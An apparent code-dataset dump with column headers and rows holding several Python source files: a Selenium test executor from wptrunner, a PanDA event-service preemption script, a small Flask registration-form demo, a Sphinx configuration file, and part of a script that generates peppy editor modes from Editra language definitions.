repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,222,525,072B
| line_mean
float64 6.51
99.8
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.96
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
sadmansk/servo
|
tests/wpt/web-platform-tests/tools/wptrunner/wptrunner/executors/executorselenium.py
|
1
|
13993
|
import json
import os
import socket
import threading
import traceback
import urlparse
import uuid
from .base import (CallbackHandler,
RefTestExecutor,
RefTestImplementation,
TestharnessExecutor,
extra_timeout,
strip_server)
from .protocol import (BaseProtocolPart,
TestharnessProtocolPart,
Protocol,
SelectorProtocolPart,
ClickProtocolPart,
SendKeysProtocolPart,
ActionSequenceProtocolPart,
TestDriverProtocolPart)
from ..testrunner import Stop
here = os.path.join(os.path.split(__file__)[0])
webdriver = None
exceptions = None
RemoteConnection = None
Command = None
def do_delayed_imports():
global webdriver
global exceptions
global RemoteConnection
global Command
from selenium import webdriver
from selenium.common import exceptions
from selenium.webdriver.remote.remote_connection import RemoteConnection
from selenium.webdriver.remote.command import Command
class SeleniumBaseProtocolPart(BaseProtocolPart):
def setup(self):
self.webdriver = self.parent.webdriver
def execute_script(self, script, async=False):
method = self.webdriver.execute_async_script if async else self.webdriver.execute_script
return method(script)
def set_timeout(self, timeout):
self.webdriver.set_script_timeout(timeout * 1000)
@property
def current_window(self):
return self.webdriver.current_window_handle
def set_window(self, handle):
self.webdriver.switch_to_window(handle)
def wait(self):
while True:
try:
self.webdriver.execute_async_script("")
except exceptions.TimeoutException:
pass
except (socket.timeout, exceptions.NoSuchWindowException,
exceptions.ErrorInResponseException, IOError):
break
except Exception as e:
self.logger.error(traceback.format_exc(e))
break
class SeleniumTestharnessProtocolPart(TestharnessProtocolPart):
def setup(self):
self.webdriver = self.parent.webdriver
self.runner_handle = None
with open(os.path.join(here, "runner.js")) as f:
self.runner_script = f.read()
def load_runner(self, url_protocol):
if self.runner_handle:
self.webdriver.switch_to_window(self.runner_handle)
url = urlparse.urljoin(self.parent.executor.server_url(url_protocol),
"/testharness_runner.html")
self.logger.debug("Loading %s" % url)
self.webdriver.get(url)
self.runner_handle = self.webdriver.current_window_handle
format_map = {"title": threading.current_thread().name.replace("'", '"')}
self.parent.base.execute_script(self.runner_script % format_map)
def close_old_windows(self):
handles = [item for item in self.webdriver.window_handles if item != self.runner_handle]
for handle in handles:
try:
self.webdriver.switch_to_window(handle)
self.webdriver.close()
except exceptions.NoSuchWindowException:
pass
self.webdriver.switch_to_window(self.runner_handle)
return self.runner_handle
def get_test_window(self, window_id, parent):
test_window = None
try:
# Try using the JSON serialization of the WindowProxy object,
# it's in Level 1 but nothing supports it yet
win_s = self.webdriver.execute_script("return window['%s'];" % window_id)
win_obj = json.loads(win_s)
test_window = win_obj["window-fcc6-11e5-b4f8-330a88ab9d7f"]
except Exception:
pass
if test_window is None:
after = self.webdriver.window_handles
if len(after) == 2:
test_window = next(iter(set(after) - set([parent])))
elif after[0] == parent and len(after) > 2:
# Hope the first one here is the test window
test_window = after[1]
else:
raise Exception("unable to find test window")
assert test_window != parent
return test_window
class SeleniumSelectorProtocolPart(SelectorProtocolPart):
def setup(self):
self.webdriver = self.parent.webdriver
def elements_by_selector(self, selector):
return self.webdriver.find_elements_by_css_selector(selector)
class SeleniumClickProtocolPart(ClickProtocolPart):
def setup(self):
self.webdriver = self.parent.webdriver
def element(self, element):
return element.click()
class SeleniumSendKeysProtocolPart(SendKeysProtocolPart):
def setup(self):
self.webdriver = self.parent.webdriver
def send_keys(self, element, keys):
return element.send_keys(keys)
class SeleniumActionSequenceProtocolPart(ActionSequenceProtocolPart):
def setup(self):
self.webdriver = self.parent.webdriver
def send_actions(self, actions):
self.webdriver.execute(Command.W3C_ACTIONS, {"actions": actions})
class SeleniumTestDriverProtocolPart(TestDriverProtocolPart):
def setup(self):
self.webdriver = self.parent.webdriver
def send_message(self, message_type, status, message=None):
obj = {
"type": "testdriver-%s" % str(message_type),
"status": str(status)
}
if message:
obj["message"] = str(message)
self.webdriver.execute_script("window.postMessage(%s, '*')" % json.dumps(obj))
class SeleniumProtocol(Protocol):
implements = [SeleniumBaseProtocolPart,
SeleniumTestharnessProtocolPart,
SeleniumSelectorProtocolPart,
SeleniumClickProtocolPart,
SeleniumSendKeysProtocolPart,
SeleniumTestDriverProtocolPart,
SeleniumActionSequenceProtocolPart]
def __init__(self, executor, browser, capabilities, **kwargs):
do_delayed_imports()
super(SeleniumProtocol, self).__init__(executor, browser)
self.capabilities = capabilities
self.url = browser.webdriver_url
self.webdriver = None
def connect(self):
"""Connect to browser via Selenium's WebDriver implementation."""
self.logger.debug("Connecting to Selenium on URL: %s" % self.url)
self.webdriver = webdriver.Remote(command_executor=RemoteConnection(self.url.strip("/"),
resolve_ip=False),
desired_capabilities=self.capabilities)
def after_conect(self):
pass
def teardown(self):
self.logger.debug("Hanging up on Selenium session")
try:
self.webdriver.quit()
except Exception:
pass
del self.webdriver
def is_alive(self):
try:
# Get a simple property over the connection
self.webdriver.current_window_handle
# TODO what exception?
except (socket.timeout, exceptions.ErrorInResponseException):
return False
return True
def after_connect(self):
self.testharness.load_runner(self.executor.last_environment["protocol"])
class SeleniumRun(object):
def __init__(self, func, protocol, url, timeout):
self.func = func
self.result = None
self.protocol = protocol
self.url = url
self.timeout = timeout
self.result_flag = threading.Event()
def run(self):
timeout = self.timeout
try:
self.protocol.base.set_timeout((timeout + extra_timeout))
except exceptions.ErrorInResponseException:
self.logger.error("Lost WebDriver connection")
return Stop
executor = threading.Thread(target=self._run)
executor.start()
flag = self.result_flag.wait(timeout + 2 * extra_timeout)
if self.result is None:
if flag:
# flag is True unless we timeout; this *shouldn't* happen, but
# it can if self._run fails to set self.result due to raising
self.result = False, ("INTERNAL-ERROR", "self._run didn't set a result")
else:
self.result = False, ("EXTERNAL-TIMEOUT", None)
return self.result
def _run(self):
try:
self.result = True, self.func(self.protocol, self.url, self.timeout)
except exceptions.TimeoutException:
self.result = False, ("EXTERNAL-TIMEOUT", None)
except (socket.timeout, exceptions.ErrorInResponseException):
self.result = False, ("CRASH", None)
except Exception as e:
message = str(getattr(e, "message", ""))
if message:
message += "\n"
message += traceback.format_exc(e)
self.result = False, ("INTERNAL-ERROR", e)
finally:
self.result_flag.set()
class SeleniumTestharnessExecutor(TestharnessExecutor):
supports_testdriver = True
def __init__(self, browser, server_config, timeout_multiplier=1,
close_after_done=True, capabilities=None, debug_info=None,
**kwargs):
"""Selenium-based executor for testharness.js tests"""
TestharnessExecutor.__init__(self, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.protocol = SeleniumProtocol(self, browser, capabilities)
with open(os.path.join(here, "testharness_webdriver.js")) as f:
self.script = f.read()
with open(os.path.join(here, "testharness_webdriver_resume.js")) as f:
self.script_resume = f.read()
self.close_after_done = close_after_done
self.window_id = str(uuid.uuid4())
def is_alive(self):
return self.protocol.is_alive()
def on_environment_change(self, new_environment):
if new_environment["protocol"] != self.last_environment["protocol"]:
self.protocol.testharness.load_runner(new_environment["protocol"])
def do_test(self, test):
url = self.test_url(test)
success, data = SeleniumRun(self.do_testharness,
self.protocol,
url,
test.timeout * self.timeout_multiplier).run()
if success:
return self.convert_result(test, data)
return (test.result_cls(*data), [])
def do_testharness(self, protocol, url, timeout):
format_map = {"abs_url": url,
"url": strip_server(url),
"window_id": self.window_id,
"timeout_multiplier": self.timeout_multiplier,
"timeout": timeout * 1000}
parent_window = protocol.testharness.close_old_windows()
# Now start the test harness
protocol.base.execute_script(self.script % format_map, async=True)
test_window = protocol.testharness.get_test_window(self.window_id, parent_window)
handler = CallbackHandler(self.logger, protocol, test_window)
while True:
self.protocol.base.set_window(test_window)
result = protocol.base.execute_script(
self.script_resume % format_map, async=True)
done, rv = handler(result)
if done:
break
return rv
class SeleniumRefTestExecutor(RefTestExecutor):
def __init__(self, browser, server_config, timeout_multiplier=1,
screenshot_cache=None, close_after_done=True,
debug_info=None, capabilities=None, **kwargs):
"""Selenium WebDriver-based executor for reftests"""
RefTestExecutor.__init__(self,
browser,
server_config,
screenshot_cache=screenshot_cache,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.protocol = SeleniumProtocol(self, browser,
capabilities=capabilities)
self.implementation = RefTestImplementation(self)
self.close_after_done = close_after_done
self.has_window = False
with open(os.path.join(here, "reftest.js")) as f:
self.script = f.read()
with open(os.path.join(here, "reftest-wait_webdriver.js")) as f:
self.wait_script = f.read()
def is_alive(self):
return self.protocol.is_alive()
def do_test(self, test):
self.logger.info("Test requires OS-level window focus")
self.protocol.webdriver.set_window_size(600, 600)
result = self.implementation.run_test(test)
return self.convert_result(test, result)
def screenshot(self, test, viewport_size, dpi):
# https://github.com/w3c/wptrunner/issues/166
assert viewport_size is None
assert dpi is None
return SeleniumRun(self._screenshot,
self.protocol,
self.test_url(test),
test.timeout).run()
def _screenshot(self, protocol, url, timeout):
webdriver = protocol.webdriver
webdriver.get(url)
webdriver.execute_async_script(self.wait_script)
screenshot = webdriver.get_screenshot_as_base64()
# strip off the data:img/png, part of the url
if screenshot.startswith("data:image/png;base64,"):
screenshot = screenshot.split(",", 1)[1]
return screenshot
|
mpl-2.0
| 6,949,301,740,680,533,000 | 34.787724 | 96 | 0.597513 | false |
PanDAWMS/panda-server
|
pandaserver/test/esPreemption.py
|
1
|
4461
|
import datetime
from pandaserver.taskbuffer.TaskBuffer import taskBuffer
from pandacommon.pandalogger.PandaLogger import PandaLogger
from pandacommon.pandalogger.LogWrapper import LogWrapper
from pandaserver.brokerage.SiteMapper import SiteMapper
from pandaserver.taskbuffer import ErrorCode
# password
from pandaserver.config import panda_config
# logger
_logger = PandaLogger().getLogger('esPreemption')
tmpLog = LogWrapper(_logger)
tmpLog.debug("================= start ==================")
# instantiate TB
taskBuffer.init(panda_config.dbhost,panda_config.dbpasswd,nDBConnection=1)
# instantiate sitemapper
siteMapper = SiteMapper(taskBuffer)
# time limit
timeLimit = datetime.datetime.utcnow()-datetime.timedelta(minutes=15)
# get low priority ES jobs per site
sqlEsJobs = "SELECT PandaID,computingSite,commandToPilot,startTime "
sqlEsJobs += "FROM {0}.jobsActive4 ".format(panda_config.schemaPANDA)
sqlEsJobs += "WHERE prodSourceLabel IN (:label1,:label2) AND eventService=:es "
sqlEsJobs += "AND currentPriority<:prio AND jobStatus=:jobStat "
sqlEsJobs += "ORDER BY currentPriority,PandaID "
varMap = {}
varMap[':label1'] = 'managed'
varMap[':label2'] = 'test'
varMap[':es'] = 1
varMap[':prio'] = 200
varMap[':jobStat'] = 'running'
# exec
status,res = taskBuffer.querySQLS(sqlEsJobs,varMap,arraySize=100000)
if res is None:
tmpLog.debug("total %s " % res)
else:
tmpLog.debug("total %s " % len(res))
# get number of jobs per site
siteJobsMap = {}
for pandaID,siteName,commandToPilot,startTime in res:
if siteName not in siteJobsMap:
siteJobsMap[siteName] = {'running':[],
'killing':[]}
if commandToPilot == 'tobekilled':
siteJobsMap[siteName]['killing'].append(pandaID)
else:
# kill only old jobs
if startTime < timeLimit:
siteJobsMap[siteName]['running'].append(pandaID)
# sql to get number of high priority jobs
sqlHiJobs = "SELECT count(*) FROM {0}.jobsActive4 ".format(panda_config.schemaPANDA)
sqlHiJobs += "WHERE prodSourceLabel=:label AND jobStatus IN (:jobStat1,:jobStat2) "
sqlHiJobs += "AND currentPriority>=:prio AND computingSite=:site AND eventService IS NULL "
sqlHiJobs += "AND startTime<:timeLimit "
# sql to kill job
sqlKill = "UPDATE {0}.jobsActive4 ".format(panda_config.schemaPANDA)
sqlKill += "SET commandToPilot=:com,supErrorCode=:code,supErrorDiag=:diag "
sqlKill += "WHERE PandaID=:pandaID AND jobStatus=:jobStatus "
# check all sites
for siteName in siteJobsMap:
jobsMap = siteJobsMap[siteName]
# check jobseed
siteSpec = siteMapper.getSite(siteName)
# skip ES-only sites
if siteSpec.getJobSeed() == 'es':
continue
# get number of high priority jobs
varMap = {}
varMap[':label'] = 'managed'
varMap[':jobStat1'] = 'activated'
varMap[':jobStat2'] = 'starting'
varMap[':prio'] = 800
varMap[':timeLimit'] = timeLimit
status,res = taskBuffer.querySQLS(sqlHiJobs,varMap)
if res is not None:
nJobs = res[0][0]
nJobsToKill = nJobs-len(siteJobsMap[siteName]['killing'])
tmpLog.debug("site={0} nHighPrioJobs={1} nRunnigES={2} nKillingES={3} nESToKill={4}".format(siteName,nJobs,
len(siteJobsMap[siteName]['running']),
len(siteJobsMap[siteName]['killing']),
nJobsToKill))
# not enough jobs are being killed
if nJobsToKill > 0:
# kill ES jobs
for pandaID in siteJobsMap[siteName]['running'][:nJobsToKill]:
tmpLog.debug(" kill PandaID={0}".format(pandaID))
varMap = {}
varMap[':pandaID'] = pandaID
varMap[':jobStatus'] = 'running'
varMap[':code'] = ErrorCode.EC_EventServicePreemption
varMap[':diag'] = 'preempted'
varMap[':com'] = 'tobekilled'
status,res = taskBuffer.querySQLS(sqlKill,varMap)
tmpLog.debug("================= end ==================")
|
apache-2.0
| 276,448,549,621,969,950 | 42.31068 | 142 | 0.59471 | false |
ftomassetti/polito_information_systems_python
|
forms/example_2.py
|
1
|
1451
|
from flask import Flask,request
app = Flask("My app with forms")
app.debug = True
@app.route('/register')
def show_registration_form():
# VIEW
response = '<html>'
response += ' <h1>Registration form</h1>'
response += ' <form name="registration" action="submit_registration_form" method="post">'
response += ' First name : <input type="text" name="firstname"><br/>'
response += ' Last name : <input type="text" name="lastname"><br/>'
response += ' Username : <input type="text" name="username"><br/>'
response += ' Password : <input type="password" name="password"><br/>'
response += ' Confirm password : <input type="password" name="confpassword"><br/>'
response += ' <input type="submit" value="Submit">'
response += ' </form>'
response += '</html>'
return response
@app.route('/submit_registration_form',methods=['POST'])
def process_registration_form():
print('Form')
print(request.form)
# CONTROLLER
password_match = request.form['password']==request.form['confpassword']
print("Password match? "+str(password_match))
# if password do not match we would like to send back the
# user and refill the form with the information that were
# correct...
# VIEW
response = '<html>'
if password_match:
response += ' <h1>Thank you for registering!</h1>'
else:
response += ' <h1>Problem with the registration</h1>'
response += '</html>'
return response
app.run()
|
mit
| -4,677,855,903,865,515,000 | 32 | 91 | 0.651275 | false |
andras-tim/sphinxcontrib-httpdomain
|
doc/conf.py
|
1
|
8340
|
# -*- coding: utf-8 -*-
#
# sphinxcontrib-httpdomain documentation build configuration file, created by
# sphinx-quickstart on Thu Jun 2 13:27:52 2011.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('..'))
sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinxcontrib.httpdomain', 'sphinxcontrib.autohttp.flask',
'sphinxcontrib.autohttp.bottle',
'sphinxcontrib.autohttp.tornado',
'sphinx.ext.extlinks']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'sphinxcontrib-httpdomain'
copyright = u'2011, Hong Minhee'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.3'
# The full version, including alpha/beta/rc tags.
release = '1.3.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinxdoc'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'sphinxcontrib-httpdomaindoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'sphinxcontrib-httpdomain.tex',
u'sphinxcontrib-httpdomain Documentation',
u'Hong Minhee', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'sphinxcontrib-httpdomain',
u'sphinxcontrib-httpdomain Documentation',
[u'Hong Minhee'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'sphinxcontrib-httpdomain',
u'sphinxcontrib-httpdomain Documentation', u'Hong Minhee',
'sphinxcontrib-httpdomain', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
extlinks = {
'pull': ('https://bitbucket.org/birkenfeld/sphinx-contrib/pull-request/%s/',
'pull request #'),
'issue': ('https://bitbucket.org/birkenfeld/sphinx-contrib/issue/%s/',
'issue #')
}
|
bsd-2-clause
| 1,940,652,276,734,229,500 | 31.834646 | 80 | 0.702158 | false |
robmcmullen/peppy
|
editra.in/make-major-modes-from-editra.py
|
1
|
13072
|
#!/usr/bin/env python
import os, shutil, sys, glob, imp
import __builtin__
import ConfigParser
from cStringIO import StringIO
from optparse import OptionParser
import wx.stc
__builtin__._ = str
sys.path.append("..")
from peppy.debug import *
from facade import *
facade = EditraFacade()
class_attr_template = ''' keyword = '%(keyword)s'
editra_synonym = '%(lang)s'
stc_lexer_id = %(lexer)s
start_line_comment = %(start_comment)s
end_line_comment = %(end_comment)s'''
classprefs_template = ''' StrParam('extensions', '%(extensions)s', fullwidth=True),'''
keyword_set_template = ''' StrParam('keyword_set_%d', unique_keywords[%d], hidden=False, fullwidth=True),'''
template = '''# peppy Copyright (c) 2006-2009 Rob McMullen
# Licenced under the GPLv2; see http://peppy.flipturn.org for more info
"""%(lang)s programming language editing support.
Major mode for editing %(lang)s files.
Supporting actions and minor modes should go here only if they are uniquely
applicable to this major mode and can't be used in other major modes. If
actions can be used with multiple major modes, they should be put in a
separate plugin in the peppy/plugins directory.
"""
import os
import wx
import wx.stc
from peppy.lib.foldexplorer import *
from peppy.lib.autoindent import *
from peppy.yapsy.plugins import *
from peppy.major import *
from peppy.fundamental import FundamentalMode
from peppy.editra.style_specs import unique_keywords
class %(class_name)sMode(FundamentalMode):
"""Stub major mode for editing %(keyword)s files.
This major mode has been automatically generated and is a boilerplate/
placeholder major mode. Enhancements to this mode are appreciated!
"""
%(class_attrs)s
icon = 'icons/page_white.png'
default_classprefs = (
%(classprefs)s
)
class %(class_name)sModePlugin(IPeppyPlugin):
"""Plugin to register modes and user interface for %(keyword)s
"""
def getMajorModes(self):
yield %(class_name)sMode
'''
# Global lists and dicts using my multiple processes
langs = facade.getAllEditraLanguages()
extra_properties = {}
syntax_style_specs = {}
keywords = {}
stc_lexer_id = {}
for lang in langs:
keyword = facade.getPeppyModeKeyword(lang)
#dprint(keyword)
extra_properties[keyword] = facade.getEditraExtraProperties(lang)
syntax_style_specs[keyword] = facade.getEditraSyntaxSpecs(lang)
keywords[keyword] = facade.getEditraLanguageKeywords(lang)
stc_lexer_id[keyword] = facade.getEditraSTCLexer(lang)
def findCommonKeywords(keywords):
unique_keywords = []
unique_id = 0
keywords_text = {}
keywords_mapping = {}
for lang, keyword_dict in keywords.iteritems():
if lang not in keywords_mapping:
dprint("adding %s" % lang)
keywords_mapping[lang] = {}
try:
for id, text in keyword_dict.iteritems():
# keyword_spec is a tuple of int and string
if text in keywords_text:
dprint("found common for %s, %d: %s" % (lang, id, keywords_text[text]))
keywords_mapping[lang][id] = keywords_text[text]
else:
keywords_text[text] = unique_id
unique_keywords.append(text)
keywords_mapping[lang][id] = unique_id
unique_id += 1
except (ValueError, TypeError):
dprint(lang)
dprint(keyword_spec_list)
raise
except KeyError:
dprint(keywords_mapping.keys())
raise
dprint(keywords_mapping)
return unique_keywords, keywords_mapping
unique_keywords, keywords_mapping = findCommonKeywords(keywords)
# Processing routines
def process(destdir):
missing, existing = getDefinedModes(destdir)
for mode in missing:
convertEditraMode(destdir, mode)
for mode in existing:
updateEditraMode(destdir, mode)
def getDefinedModes(destdir):
langs = facade.getAllEditraLanguages()
missing = []
existing = []
for lang in langs:
module_name = facade.getPeppyFileName(lang)
module_path = os.path.join(destdir, module_name + ".py")
if os.path.exists(module_path):
#dprint("found %s -> %s -> %s" % (lang, module_name, module_path))
existing.append(lang)
else:
#dprint("CREATING %s -> %s -> %s" % (lang, module_name, module_path))
missing.append(lang)
return missing, existing
def getEditraInfo(lang):
module_name = facade.getPeppyFileName(lang)
syn = facade.getEditraSyntaxData(lang)
keyword = facade.getPeppyModeKeyword(lang)
vals = {
'lang': lang,
'keyword': keyword,
'class_name': facade.getPeppyClassName(lang),
'module_name': module_name,
'extensions': " ".join(facade.getExtensionsForLanguage(lang)),
'lexer': facade.getEditraSTCLexerName(lang),
'start_comment': repr(facade.getEditraCommentChars(lang)[0]),
'end_comment': repr(facade.getEditraCommentChars(lang)[1]),
}
vals['class_attrs'] = class_attr_template % vals
classprefs = classprefs_template % vals
order = sorted(keywords_mapping[keyword].iteritems())
for keyword_set_id, unique_id in order:
classprefs += "\n" + keyword_set_template % (keyword_set_id, unique_id)
vals['classprefs'] = classprefs
return module_name, vals
def convertEditraMode(destdir, lang):
module_name, vals = getEditraInfo(lang)
module_path = os.path.join(destdir, module_name + ".py")
text = template % vals
#print(text)
fh = open(module_path, 'w')
fh.write(text)
fh.close()
generatePluginFile(destdir, lang)
def updateEditraMode(destdir, lang):
module_name, vals = getEditraInfo(lang)
module_path = os.path.join(destdir, module_name + ".py")
fh = open(module_path, 'r')
text = fh.read()
fh.close()
classtext = ClassText(text, lang)
classtext.replace(vals)
fh = open(module_path, 'w')
fh.write(str(classtext))
fh.close()
class ClassText(object):
"""Gets the class attribute section of the major mode class
"""
def __init__(self, text, lang):
self.header = ""
self.class_attrs = ""
self.classprefs = ""
self.footer = ""
self.lang = lang
self.parse(text)
def __str__(self):
#return "Class Attribute Section: %s\nClass Preference Section: %s"% (self.class_attrs, self.classprefs)
return self.header + self.class_attrs + self.classprefs + self.footer
def parse(self, text):
classmatch = "class %sMode(" % facade.getPeppyClassName(self.lang)
#dprint(classmatch)
state = "header"
for line in text.splitlines(True):
#dprint(line)
if state == "header":
if line.startswith(classmatch):
state = "in_class"
else:
self.header += line
if state == "in_class":
if line.strip().startswith("keyword =") or line.strip().startswith("keyword="):
state = "class_attrs"
else:
self.header += line
if state == "class_attrs":
if line.strip().startswith("default_classprefs"):
state = "classprefs"
else:
self.class_attrs += line
if state == "classprefs":
if line.strip() == ")":
state = "footer"
else:
self.classprefs += line
if state == "footer":
self.footer += line
def replace(self, vals):
"""Replace any class attributes or classprefs with the new values
"""
self.replaceImports()
self.replaceClassAttrs(vals)
self.replaceClassprefs(vals)
def replaceImports(self):
"""Special case to add the unique_keywords dict to the list of imports
In versions prior to r2412, the import statement for unique_keywords
from peppy.editra.style_specs didn't exist. Now that keywords can be
modified by the user, the import statement must be included because
the StrParams reference the unique_keywords dict to supply defaults
for the preferences.
"""
extra = "from peppy.editra.style_specs import unique_keywords"
try:
self.header.index(extra)
except ValueError:
dprint("Replacing imports for %s" % self.lang)
index = self.header.index("from peppy.fundamental import")
self.header = self.header[0:index] + extra + "\n" + self.header[index:]
def replaceClassAttrs(self, vals):
newattrs = vals['class_attrs']
keywords = {}
for attrline in newattrs.splitlines():
keyword, value = attrline.split("=")
keyword = keyword.strip()
keywords[keyword] = attrline
lines = self.class_attrs.splitlines(True)
newlines = ""
for line in lines:
splitted = line.split("=")
if len(splitted) > 1 and splitted[0].strip() in keywords:
# Replace the keyword with the new value
#newlines += keywords[splitted[0]]
#del keywords[splitted[0]]
pass
else:
newlines += line
self.class_attrs = newattrs + "\n" + newlines
def replaceClassprefs(self, vals):
newprefs = vals['classprefs']
keywords = set()
for attrline in newprefs.splitlines():
keyword, value = attrline.split(",", 1)
keywords.add(keyword)
lines = self.classprefs.splitlines(True)
newlines = ""
# the default_classprefs should start it out
newprefs = lines[0] + newprefs
for line in lines[1:]:
splitted = line.split(",")
if len(splitted) > 1 and splitted[0] in keywords:
pass
else:
newlines += line
self.classprefs = newprefs + "\n" + newlines
def generatePluginFile(destdir, lang):
module_name = facade.getPeppyFileName(lang)
plugin_path = os.path.join(destdir, module_name + ".peppy-plugin")
conf = ConfigParser.ConfigParser()
conf.add_section("Core")
conf.set("Core", "Name", "%s Mode" % facade.getPeppyModeKeyword(lang))
conf.set("Core", "Module", module_name)
conf.add_section("Documentation")
conf.set("Documentation", "Author", "Rob McMullen")
conf.set("Documentation", "Version", "0.1")
conf.set("Documentation", "Website", "http://www.flipturn.org/peppy")
conf.set("Documentation", "Description", "Major mode for editing %s files" % facade.getPeppyModeKeyword(lang))
fh = open(plugin_path, "w")
conf.write(fh)
def processSampleText(filename):
#dprint("Processing sample text")
langs = facade.getAllEditraLanguages()
sample_text = {}
for lang in langs:
keyword = facade.getPeppyModeKeyword(lang)
sample_text[keyword] = facade.getEditraLanguageSampleText(lang)
import pprint
pp = pprint.PrettyPrinter()
fh = open(filename, "w")
fh.write("# Generated file containing the sample text for Editra modes\n")
fh.write("sample_text=")
fh.write(pp.pformat(sample_text))
fh.close()
def processStyleSpecs(filename):
#dprint("Processing style specs")
import pprint
pp = pprint.PrettyPrinter()
fh = open(filename, "w")
fh.write("# Generated file containing Editra style defaults for those major modes based\n# on Editra style files\n")
fh.write("\nstc_lexer_id=")
fh.write(pp.pformat(stc_lexer_id))
fh.write("\nsyntax_style_specs=")
fh.write(pp.pformat(syntax_style_specs))
fh.write("\nextra_properties=")
fh.write(pp.pformat(extra_properties))
if keywords_mapping:
fh.write("\nkeywords_mapping=")
fh.write(pp.pformat(keywords_mapping))
fh.write("\nunique_keywords=")
fh.write(pp.pformat(unique_keywords))
fh.write("\n")
fh.close()
if __name__ == "__main__":
usage="usage: %prog [-s dir] [-o file]"
parser=OptionParser(usage=usage)
parser.add_option("-o", action="store", dest="outputdir",
default="../peppy/major_modes", help="output directory")
parser.add_option("--sample-text", action="store", dest="sample_text_file",
default="../peppy/editra/sample_text.py", help="dict containing sample text for each editra language")
